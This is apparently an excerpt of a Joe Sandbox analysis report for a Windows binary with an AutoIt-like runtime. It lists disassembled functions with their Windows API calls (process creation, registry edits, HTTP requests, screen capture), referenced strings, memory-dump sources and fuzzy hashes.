API String ID: 895679908-0
Opcode ID: fdf17654ef31956a67365058dbbcb20e5fb294207b8718726852aed950ab28d1
Instruction ID: 1b40c2f44feb6ac415a174b5a515e8ec2c49d6f22a8a6d1083b38ea42b11f207
Opcode Fuzzy Hash: fdf17654ef31956a67365058dbbcb20e5fb294207b8718726852aed950ab28d1
Instruction Fuzzy Hash: D4717C31900B05EFDB20EFA8DE85BAEBBF5FF48704F144518E586A66A4D771E940CB24

Function 00DB30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DB318D
_wcslen.LIBCMT ref: 00DB31F8

Strings

INSTANCE, xrefs: 00DB3453
NAME, xrefs: 00DB3335, 00DB3346
CLASS, xrefs: 00DB3188, 00DB31A5
CLASSNN, xrefs: 00DB31F3, 00DB3204
TEXT, xrefs: 00DB347C
REGEXPCLASS, xrefs: 00DB3255, 00DB3266
[, xrefs: 00DB339A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
API String ID: 176396367-1901692981
Opcode ID: 4d46d4fd19ab8d8112129052a71b82fa6de0cbf2f3985ba1c2d210d0cb5d8bfd
Instruction ID: 46aa1555892507f9373a259e82ed7062b465e7ff373320cb565a8e3d9b5aa79f
Opcode Fuzzy Hash: 4d46d4fd19ab8d8112129052a71b82fa6de0cbf2f3985ba1c2d210d0cb5d8bfd
Instruction Fuzzy Hash: DEE19832A00616EBCB15DF78C451AEEBBB4FF54750F588119E457B7240DB309E89ABB0

Function 00D700C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D700C6

Part of subcall function 00D700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E2070C,00000FA0,CA86848F,?,?,?,?,00D923B3,000000FF), ref: 00D7011C
Part of subcall function 00D700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D923B3,000000FF), ref: 00D70127
Part of subcall function 00D700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D923B3,000000FF), ref: 00D70138
Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D7014E
Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D7015C
Part of subcall function 00D700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D7016A
Part of subcall function 00D700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D70195
Part of subcall function 00D700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D701A0

___scrt_fastfail.LIBCMT ref: 00D700E7

Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D70122
WakeAllConditionVariable, xrefs: 00D70162
kernel32.dll, xrefs: 00D70133
SleepConditionVariableCS, xrefs: 00D70154
InitializeConditionVariable, xrefs: 00D70148

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 55510a31d039838e884e538f6c7facf585739b782db2350a78eeca334a2c86f4
Instruction ID: 7929222bd00150e70c92e849d600821b0215df349e5ad0bcd1a31f2cd4ae117c
Opcode Fuzzy Hash: 55510a31d039838e884e538f6c7facf585739b782db2350a78eeca334a2c86f4
Instruction Fuzzy Hash: 8C210B32A44750EFD7217B65AC45B6A3F94DB04B61F04813AFC09E67D2EBB09C048AB0

Function 00DC44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00DECC08), ref: 00DC4527
_wcslen.LIBCMT ref: 00DC453B
_wcslen.LIBCMT ref: 00DC4599
_wcslen.LIBCMT ref: 00DC45F4
_wcslen.LIBCMT ref: 00DC463F
_wcslen.LIBCMT ref: 00DC46A7

Part of subcall function 00D6F9F2: _wcslen.LIBCMT ref: 00D6F9FD

GetDriveTypeW.KERNEL32(?,00E16BF0,00000061), ref: 00DC4743

Strings

cdrom, xrefs: 00DC458F, 00DC4594
all, xrefs: 00DC4531, 00DC4536
network, xrefs: 00DC469D, 00DC46A2
fixed, xrefs: 00DC4635, 00DC463A
removable, xrefs: 00DC45EA, 00DC45EF
unknown, xrefs: 00DC4708
ramdisk, xrefs: 00DC46F1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: ce4709f1f118868e2b33418a414f0dfea2476836da0c93a31a31e4bc281230e4
Instruction ID: da0429a49520e76d5c8e7868fe44cda21db80f059cc566a7a04437517562d2b3
Opcode Fuzzy Hash: ce4709f1f118868e2b33418a414f0dfea2476836da0c93a31a31e4bc281230e4
Instruction Fuzzy Hash: 9CB1D2316083029FC710DF28C8A1EAAB7E5EFA5760F54491DF896C7295E730D845CBB2

Function 00DE911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

DragQueryPoint.SHELL32(?,?), ref: 00DE9147

Part of subcall function 00DE7674: ClientToScreen.USER32(?,?), ref: 00DE769A
Part of subcall function 00DE7674: GetWindowRect.USER32(?,?), ref: 00DE7710
Part of subcall function 00DE7674: PtInRect.USER32(?,?,00DE8B89), ref: 00DE7720

SendMessageW.USER32(?,000000B0,?,?), ref: 00DE91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DE91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DE91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DE9225
SendMessageW.USER32(?,000000B0,?,?), ref: 00DE923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00DE9255
SendMessageW.USER32(?,000000B1,?,?), ref: 00DE9277
DragFinish.SHELL32(?), ref: 00DE927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DE9371

Strings

p#, xrefs: 00DE92BB
@GUI_DRAGID, xrefs: 00DE92E9
@GUI_DROPID, xrefs: 00DE929E
@GUI_DRAGFILE, xrefs: 00DE9320

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
API String ID: 221274066-136824727
Opcode ID: d9d6be5f3b7174bfbc5cf450759a4f8e755ea2fc05264ec54205788d91adf2c4
Instruction ID: 87cf0b4c546ed22e644a2fcce2c9fcc858a7d8c85a309ef3aed44d2c44c13d83
Opcode Fuzzy Hash: d9d6be5f3b7174bfbc5cf450759a4f8e755ea2fc05264ec54205788d91adf2c4
Instruction Fuzzy Hash: BE618A71108341AFC701EF65DC95DAFBBE8EF88750F40091DF995962A1DB309A49CB72

Function 00DDAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DDB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB1D4
_wcslen.LIBCMT ref: 00DDB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DDB236
_wcslen.LIBCMT ref: 00DDB332

Part of subcall function 00DC05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DC05C6

_wcslen.LIBCMT ref: 00DDB34B
_wcslen.LIBCMT ref: 00DDB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DDB3B6
GetLastError.KERNEL32(00000000), ref: 00DDB407
CloseHandle.KERNEL32(?), ref: 00DDB439
CloseHandle.KERNEL32(00000000), ref: 00DDB44A
CloseHandle.KERNEL32(00000000), ref: 00DDB45C
CloseHandle.KERNEL32(00000000), ref: 00DDB46E
CloseHandle.KERNEL32(?), ref: 00DDB4E3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 3b9b155b8fef47b41c5864f74e51c37e46ac62f9d5150ef19eba3dd6fe55cd39
Instruction ID: 91b6a5b14b429dea4d82e3b1ff5a32039fa009c4d5f84460b072fff744b1738f
Opcode Fuzzy Hash: 3b9b155b8fef47b41c5864f74e51c37e46ac62f9d5150ef19eba3dd6fe55cd39
Instruction Fuzzy Hash: A0F14931504340DFCB14EF24C891A6ABBE5EF85328F19855EF8959B2A2DB31EC45CB72

Function 00D5326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00E21990), ref: 00D92F8D
GetMenuItemCount.USER32(00E21990), ref: 00D9303D
GetCursorPos.USER32(?), ref: 00D93081
SetForegroundWindow.USER32(00000000), ref: 00D9308A
TrackPopupMenuEx.USER32(00E21990,00000000,?,00000000,00000000,00000000), ref: 00D9309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D930A9

Strings

0, xrefs: 00D5327D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: be6e7e0b8367129455735ae4fd6b0e4957078997a84587a160b6c6804fe3756f
Instruction ID: 823d3672551926ac06fe1de43ed249cfe2c7a97f7f32d16d5ba08935648e4f1c
Opcode Fuzzy Hash: be6e7e0b8367129455735ae4fd6b0e4957078997a84587a160b6c6804fe3756f
Instruction Fuzzy Hash: 0A712930640345BEEF219F65CC89FAABF64FF04364F244216F919AA1E0C7B1A914CB70

Function 00DE6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00DE6DEB

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DE6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DE6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE6E94
DestroyWindow.USER32(?), ref: 00DE6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D50000,00000000), ref: 00DE6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DE6EFD
GetDesktopWindow.USER32 ref: 00DE6F16
GetWindowRect.USER32(00000000), ref: 00DE6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DE6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DE6F4D

Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952

Strings

tooltips_class32, xrefs: 00DE6E58, 00DE6EDD
0, xrefs: 00DE6D98

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: ce16521dfa571dc270e7399ada2fe4c94c771e96c64f178cd704307955a1ee58
Instruction ID: a51d571bcd32876490dd46cc464a2f3ba21369cfb4a1c183962adc7bc46efcaf
Opcode Fuzzy Hash: ce16521dfa571dc270e7399ada2fe4c94c771e96c64f178cd704307955a1ee58
Instruction Fuzzy Hash: 1D718B70104380AFDB20EF19D884BAABBE9FF99740F08441DF98997261D770ED4ACB21

Function 00DCC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DCC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DCC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DCC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DCC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DCC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DCC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DCC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DCC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DCC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DCC5F0
InternetCloseHandle.WININET(00000000), ref: 00DCC5FB

Strings

, xrefs: 00DCC575

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 8b876e05ff9f43af64397dcfc27d84c9fa4bea7bf5a3cfa2e095a5f260fbda8f
Instruction ID: 7425ceca8b581c42503e51fda602150eea9ee7e9d1cef2b64b27d1d7c90fa1e2
Opcode Fuzzy Hash: 8b876e05ff9f43af64397dcfc27d84c9fa4bea7bf5a3cfa2e095a5f260fbda8f
Instruction Fuzzy Hash: 14515BB152074ABFDB219F64C988FAA7BBCEB08344F04941DFA49D7650EB30E9459B70

Function 00DE856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00DE8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DE85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00DEFC38,?), ref: 00DE8611
GlobalFree.KERNEL32(00000000), ref: 00DE8621
GetObjectW.GDI32(?,00000018,?), ref: 00DE8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00DE8671
DeleteObject.GDI32(?), ref: 00DE8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DE86AF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 5df70a48eecf5c447e56890df5e4db685063b82499a2f98e66926dbc3432039d
Instruction ID: ff3395a19624a6e7959db125f1f349e8486db0acd5ef704937fa906ec71bcdd3
Opcode Fuzzy Hash: 5df70a48eecf5c447e56890df5e4db685063b82499a2f98e66926dbc3432039d
Instruction Fuzzy Hash: 8941F975610384AFDB11EFA5DC88EAE7BB8EF89715F144058F919EB260DB309902DB70

Function 00DC14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00DC1502
VariantCopy.OLEAUT32(?,?), ref: 00DC150B
VariantClear.OLEAUT32(?), ref: 00DC1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DC15FB
VarR8FromDec.OLEAUT32(?,?), ref: 00DC1657
VariantInit.OLEAUT32(?), ref: 00DC1708
SysFreeString.OLEAUT32(?), ref: 00DC178C
VariantClear.OLEAUT32(?), ref: 00DC17D8
VariantClear.OLEAUT32(?), ref: 00DC17E7
VariantInit.OLEAUT32(00000000), ref: 00DC1823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00DC1625
Default, xrefs: 00DC16AF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 64cef45fe5b90ad6875766ac1142697ec991362ba33353a87b8290464ccd5d41
Instruction ID: 2fd0479b72f3e591a4fc4a8730789a80a4a676ab1ccaf9d05f191733469df3c5
Opcode Fuzzy Hash: 64cef45fe5b90ad6875766ac1142697ec991362ba33353a87b8290464ccd5d41
Instruction Fuzzy Hash: 1AD11375A10222DBCB00AF65D885F79B7B5FF46700F54849AE846AB282DB30EC45DB71

Function 00DDB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDB772
RegDeleteValueW.ADVAPI32(?,?), ref: 00DDB80A
RegCloseKey.ADVAPI32(?), ref: 00DDB87E
RegCloseKey.ADVAPI32(?), ref: 00DDB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DDB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DDB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00DDB922
FreeLibrary.KERNEL32(00000000), ref: 00DDB983
RegCloseKey.ADVAPI32(00000000), ref: 00DDB994

Strings

advapi32.dll, xrefs: 00DDB8ED
RegDeleteKeyExW, xrefs: 00DDB8FE

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: a974b78bb67fbdaaa767e60051e02746cf28c04d7dbc90a65eaad5b8c7785936
Instruction ID: cd7475fd6aa65e107629135cc9d17417f384536d3ade970c6222d959118ed7eb
Opcode Fuzzy Hash: a974b78bb67fbdaaa767e60051e02746cf28c04d7dbc90a65eaad5b8c7785936
Instruction Fuzzy Hash: 63C17D34204341EFD714DF14C495F2ABBE5EF84318F59855EE89A8B3A2CB31E846CBA1

Function 00DD255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DD25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DD25E8
CreateCompatibleDC.GDI32(?), ref: 00DD25F4
SelectObject.GDI32(00000000,?), ref: 00DD2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DD266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DD26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DD26D0
SelectObject.GDI32(?,?), ref: 00DD26D8
DeleteObject.GDI32(?), ref: 00DD26E1
DeleteDC.GDI32(?), ref: 00DD26E8
ReleaseDC.USER32(00000000,?), ref: 00DD26F3

Strings

(, xrefs: 00DD268D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 9b2d9980ae6175dfa21bb4802f396575c2f32f5a5dde50a2f645407415157309
Instruction ID: 6d04c249ba304fbc6b4ee9b0e97eb5a43f67aaa95aa962a9c42c4cd01a3597f3
Opcode Fuzzy Hash: 9b2d9980ae6175dfa21bb4802f396575c2f32f5a5dde50a2f645407415157309
